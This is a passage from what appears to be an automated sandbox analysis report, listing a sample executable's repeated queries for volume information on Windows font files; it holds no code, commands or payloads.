                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
